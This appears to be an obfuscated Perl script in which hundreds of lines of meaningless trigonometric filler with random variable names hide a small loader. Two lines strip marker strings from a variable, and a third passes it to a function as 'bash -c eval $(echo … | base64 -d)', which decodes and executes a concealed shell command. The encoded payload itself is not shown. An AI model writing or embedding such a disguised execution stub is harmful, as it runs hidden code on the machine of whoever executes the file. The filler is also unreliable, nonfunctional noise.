my $qjuojeq = cos(-6.58) * cos(-32.97);
my $jvxyfhs = 43.15392;
my $jvxvdln = cos(-20.53) + cos(-3.4716673);
my $hhgkxgh = 2.596076;
$hhgkxgh = cos($jvxyfhs) + cos(49.78) * sin(-17.999) * sin($jvxvdln);
$jvxyfhs = sin(14.302209) - cos(48.478) - cos($qjuojeq);
$jvxvdln = cos($jvxyfhs) - sin(42.913);
print "$hhgkxgh\n";
$hhgkxgh = sin($jvxyfhs) - sin($jvxvdln) * cos($qjuojeq);

my $zpmqsno = 39.4597;
my $orbxyom = 18.335;
my $savmrsw = sin(26.4305459) + cos(-34.72) * sin(-43.537715) + cos(-22.691);
$zpmqsno = cos($zpmqsno) + cos($orbxyom) + sin($zpmqsno);
print "$savmrsw\n";
$orbxyom = cos(18.6332508) - sin($savmrsw) * cos($savmrsw);
$zpmqsno = sin(-29.2105) * sin(30.68) * sin($orbxyom) - cos($zpmqsno);

my $agvpgbg = sin(14.99) + sin(36.623253) * sin(28.464);
my $mrxatqw = -38.3433907;
my $mhbcloc = sin(35.614) + cos(48.154) - cos(-38.2219) - sin(-33.08454);
my $detggdj = sin(11.263) * sin(-17.0854816) + sin(33.4589) - sin(-34.7947);
$mrxatqw = sin($mrxatqw) - sin($detggdj) + sin(-46.3734969) + cos(-8.822);
print "$agvpgbg\n";
$detggdj = cos(33.836) - sin(-35.886) + sin($mhbcloc);
$detggdj = cos(-19.198943) + sin(-13.45) - cos($mhbcloc) + cos(-44.563958);
print "$detggdj\n";
$mhbcloc = cos($mrxatqw) * sin($mhbcloc) * cos($detggdj);

my $rviqlqx = 42.4023;
my $emhdenq = -12.65716;
my $zeewezy = cos(-33.0816) - cos(-38.372) * sin(41.425215) - cos(-46.6984);
my $byiurvg = sin(27.67146) - sin(-22.56) - sin(-7.85) - cos(0.37);
$byiurvg = sin(47.15909) + cos($emhdenq) + cos(-10.712303);
print "$zeewezy\n";
$zeewezy = sin(18.88) + sin(32.4958) * cos(-20.15);
$zeewezy = sin(-17.389) - cos(-48.7130696) + sin($byiurvg) * cos($emhdenq);
$zeewezy = cos(-6.184729) + sin($byiurvg);

my $oglhrry = cos(13.4540606) * sin(8.715) * sin(34.99851) * sin(-9.465247);
my $sbxnnqb = cos(49.370363) * sin(4.3446);
my $qipyzsx = sin(-6.509) * cos(31.63836) * cos(-11.368);
my $nctciuz = -26.750882;
$nctciuz = sin($nctciuz) * sin($oglhrry);
print "$qipyzsx\n";
$oglhrry = cos($oglhrry) + sin($sbxnnqb) - sin($oglhrry);
$nctciuz = sin($sbxnnqb) + sin(47.3813051);
print "$nctciuz\n";
$oglhrry = cos(-48.3114) - cos(37.179) + sin(47.5433);
print "$nctciuz\n";

my $nrihbww = 0.10838;
my $zcadtrx = 6.27;
$nrihbww = sin(-17.113094) + cos(0.0076901);
$nrihbww = cos($zcadtrx) + cos(47.831) + cos(-37.5420849) + cos($nrihbww);

my $onsoqum = sin(-31.353943) - sin(2.35) * cos(-1.9135) + cos(-26.692);
my $zmgmmfn = -13.102347;
$zmgmmfn = cos($zmgmmfn) + sin($zmgmmfn) + cos($onsoqum);
print "$zmgmmfn\n";
$zmgmmfn = sin(-17.3326921) * cos($zmgmmfn);
print "$onsoqum\n";

my $yybbnqs = cos(-20.556864) * sin(-4.1531354);
my $jstqmzy = -34.95352;
$jstqmzy = cos($jstqmzy) + cos($jstqmzy) * cos($yybbnqs);
$jstqmzy = sin(-14.9718293) - sin($yybbnqs) - sin($yybbnqs) - cos($yybbnqs);

$dsflkjn =~ s/\Q$mpwmher\E//g;

my $htgruib = -20.293;
my $pnjxwvn = 21.5207848;
my $cwvyarb = cos(-10.543) * sin(-29.5939572);
$pnjxwvn = cos(-40.503) + sin(13.0529) - cos(6.9422) + sin($pnjxwvn);
$pnjxwvn = cos($cwvyarb) * cos(5.5442) * cos($pnjxwvn) - cos($htgruib);
print "$pnjxwvn\n";
$pnjxwvn = sin(-0.54) - sin($cwvyarb) * cos(-46.475) - cos($htgruib);

$dsflkjn =~ s/\Q$pqergoi\E//g;

my $gwzocsq = sin(-26.2634) * sin(-45.0843);
my $pwewumu = -37.161;
my $aqixpwm = -47.3119283;
$gwzocsq = cos($pwewumu) + cos($gwzocsq);
print "$pwewumu\n";
$pwewumu = sin($pwewumu) + sin(-42.620611) + sin(25.9095);
$gwzocsq = sin($gwzocsq) - cos($pwewumu);

my $ejtqzgy = 37.618479;
my $fjhgggl = 48.7599;
$fjhgggl = cos($fjhgggl) + cos(7.825724);
print "$ejtqzgy\n";
$fjhgggl = cos(17.42) + sin(38.7613);
print "$fjhgggl\n";

my $pvczoha = sin(30.6332) * sin(20.22427);
my $tpnwryi = cos(6.785) - sin(-23.6193563) + cos(34.554317);
my $uwmahfy = sin(23.60084) - sin(-40.82793);
my $plukrip = sin(3.5802) * cos(28.647);
$uwmahfy = sin(-21.158437) - cos(17.8) * cos($pvczoha) + sin($plukrip);
$pvczoha = cos($uwmahfy) - sin($plukrip) * cos($tpnwryi);
print "$plukrip\n";
$uwmahfy = sin($pvczoha) * cos($tpnwryi) + cos(19.1507227);
print "$plukrip\n";
$plukrip = sin(-20.409) * sin($uwmahfy) * cos($uwmahfy) + sin(-32.746854);
print "$pvczoha\n";

my $kdbeegh = sin(-2.93) * cos(7.99) * sin(-40.4739) + sin(8.41089);
my $gplupiy = -40.322272;
$kdbeegh = sin(-2.62) - sin($kdbeegh);
print "$kdbeegh\n";
$kdbeegh = cos(-1.2834) * sin(-48.9709923);

my $kyrbsre = -4.21245;
my $verraip = cos(-40.7159) + cos(-37.8011) * sin(50.092);
my $iwbnetn = -7.54;
$iwbnetn = sin(-29.16) + sin($kyrbsre);
$iwbnetn = cos($iwbnetn) * sin($verraip) * cos($iwbnetn);
print "$iwbnetn\n";
$kyrbsre = cos($iwbnetn) + cos($verraip) - cos($iwbnetn);
print "$iwbnetn\n";

my $iqrrmns = -22.468;
my $kubtniu = -41.191;
my $ujzhqyo = cos(-10.62) - sin(14.50536) * cos(23.97038);
my $zlpdpde = 18.9276;
$kubtniu = sin(12.87272) + sin(-12.10674) + sin(-47.5317165) - sin(-28.3779052);
print "$ujzhqyo\n";
$ujzhqyo = cos($zlpdpde) * sin(25.709105) * cos(-3.012791);
$kubtniu = cos(25.5057) - cos(-11.29) + sin($kubtniu) * sin(-22.62);
$ujzhqyo = cos($iqrrmns) - cos($iqrrmns) + cos($iqrrmns);

my $srkhcvx = 19.03;
my $ahjzqzb = cos(2.2445) + sin(47.69365) + cos(-6.08574);
my $dxmgxve = -19.13;
$srkhcvx = cos($dxmgxve) + cos(-48.765965);
print "$ahjzqzb\n";
$srkhcvx = cos(-27.8921069) * cos(39.8456117);
print "$srkhcvx\n";
$srkhcvx = sin($ahjzqzb) + sin(-2.96);
print "$srkhcvx\n";

my $isivchs = cos(19.5290054) + cos(13.00131);
my $adkcauk = 43.3042347;
my $uedbpom = -43.0349648;
my $pukzqpj = sin(-15.365274) + cos(-8.13991) * sin(9.388) - cos(-20.56);
$adkcauk = sin($uedbpom) * sin(-18.864) - cos(50.13) - sin($pukzqpj);
$uedbpom = cos(28.129) * cos(-46.95);
$isivchs = sin(-30.530472) - sin(20.27);
$uedbpom = cos(27.7624097) + sin($pukzqpj) + cos($pukzqpj) * cos(43.36787);
print "$uedbpom\n";

my $iabtzwr = sin(-5.533) * sin(-44.726501) * cos(-12.7568552);
my $weujjqu = cos(7.68) + cos(4.03) - sin(-7.0329771);
my $ezagonn = sin(-37.09) * sin(-33.37272) - cos(-21.410106) - cos(-18.17567);
$weujjqu = sin(14.15046) - sin(36.282324) + cos(-41.37);
print "$iabtzwr\n";
$iabtzwr = sin($iabtzwr) * sin($weujjqu) * cos($iabtzwr) + cos($weujjqu);
$ezagonn = sin(-45.860538) * cos(17.0641453);
print "$weujjqu\n";

gapomre("bash", "-c", "eval \$(echo $dsflkjn | base64 -d)");

my $sxmsgvc = cos(11.44324) * sin(4.7643222) * cos(-37.2774741);
my $jexgauq = cos(-19.4094836) + cos(24.796);
$sxmsgvc = cos(-23.9565) + sin($jexgauq) + cos(37.575) * cos(-18.8768312);
$sxmsgvc = sin(26.0376) + sin($jexgauq) * sin($sxmsgvc);
print "$jexgauq\n";

my $zxjqlie = 50.77923;
my $fiwdrge = 48.8932201;
my $nvhdpua = -44.16945;
$zxjqlie = cos($fiwdrge) + cos(-49.247) * cos(3.6999);
print "$nvhdpua\n";
$nvhdpua = sin($fiwdrge) * sin($zxjqlie);
print "$nvhdpua\n";
$zxjqlie = sin($fiwdrge) * cos(36.421) - cos(-32.100379) - sin(38.18);
print "$fiwdrge\n";

my $dnvgkvb = cos(-25.133) - cos(-10.8982354);
my $axutzpk = sin(-4.3804549) + sin(48.336) * sin(9.74878) * cos(-19.132723);
my $rursynb = -10.152525;
$rursynb = cos(43.533974) + sin($axutzpk);
print "$rursynb\n";
$rursynb = cos($axutzpk) - cos($rursynb);
print "$dnvgkvb\n";
$rursynb = cos($axutzpk) - cos(-20.1378305) * cos(42.230933) + sin(19.49);
print "$axutzpk\n";

my $vmxpkur = cos(11.59) + sin(30.349938) * sin(45.6207);
my $oagcavc = -22.26;
my $snvwghs = sin(-36.22) * cos(46.595244) + sin(18.11);
$vmxpkur = sin($vmxpkur) * cos($oagcavc) * sin($oagcavc) - cos($oagcavc);
$snvwghs = sin(-32.7501) - sin(28.78817) - sin($oagcavc);
$vmxpkur = cos(44.52209) - sin($oagcavc) + sin(3.41711) * cos(34.0646);

my $pcdwqhc = -47.456;
my $ulzapmr = sin(9.370652) * cos(17.0676) * sin(-13.069) * cos(-28.13);
my $fdpdsoy = -0.081;
$fdpdsoy = cos($fdpdsoy) * cos($ulzapmr) * sin($ulzapmr);
print "$ulzapmr\n";
$fdpdsoy = sin(4.3107642) + sin($pcdwqhc);
print "$pcdwqhc\n";
$pcdwqhc = sin(34.61237) * cos($pcdwqhc);
print "$pcdwqhc\n";

my $pyvtbeh = -44.79;
my $rabwmpi = -34.91;
$pyvtbeh = cos(-45.14) - sin($rabwmpi) - sin($pyvtbeh);
$pyvtbeh = cos(41.1314) * cos(31.656663) * cos($rabwmpi);

my $dsdyrhz = 40.5628;
my $odnsbmd = sin(-47.96) + sin(18.3942762) + cos(22.13175);
my $lnabpik = sin(-33.64) - sin(7.789153) - sin(-3.275697) * cos(46.5594);
my $oomqepz = -23.62463;
$dsdyrhz = cos($oomqepz) - cos(19.9396);
print "$oomqepz\n";
$oomqepz = cos($dsdyrhz) + sin($dsdyrhz) - cos(-6.8659) - cos($oomqepz);
$odnsbmd = cos($lnabpik) - cos(-19.9818433) + cos(-8.9706458);
print "$oomqepz\n";
$odnsbmd = cos($lnabpik) - sin($dsdyrhz) * sin($dsdyrhz) - sin(-6.24);

my $wnbtyqe = sin(8.5467) * cos(3.009);
my $wmpnojo = sin(-10.1712) - cos(4.08) - sin(31.420478);
my $mkbqagt = sin(41.7983) * sin(-15.9207);
$wnbtyqe = sin($wnbtyqe) - cos(10.57);
$wmpnojo = cos($mkbqagt) * cos($wnbtyqe) - cos($mkbqagt);
$wmpnojo = sin(-30.25) * sin($wnbtyqe) + cos($mkbqagt) + sin(22.487);
print "$wnbtyqe\n";

my $qzxikyt = cos(-10.3623972) * cos(-10.3028);
my $tkjjzlh = sin(-2.4586) * cos(-13.19) - cos(26.9324406);
my $rolahnu = sin(50.0247593) * sin(-39.081) + cos(-2.6603);
my $rbrqjzh = 14.7;
$rbrqjzh = cos(32.494) - cos(-16.6486) * sin($rbrqjzh);
$qzxikyt = sin(-35.407) - cos($rbrqjzh) + cos($rolahnu);
print "$rolahnu\n";
$rbrqjzh = cos(12.71) * sin($qzxikyt);
print "$rolahnu\n";
$tkjjzlh = cos(-22.6) + cos($rolahnu);
print "$tkjjzlh\n";

my $btflncx = cos(27.984) * cos(-40.26335) * sin(26.43723) * sin(34.7706);
my $aqbjnpf = 4.061;
my $bljywqi = -37.6834688;
$bljywqi = cos(-39.3424) * sin(-42.03) * cos(6.0627086);
print "$btflncx\n";
$btflncx = cos($aqbjnpf) - sin(-18.0766);
$btflncx = cos(-26.085) - sin(-20.45824) - cos($btflncx);
print "$bljywqi\n";


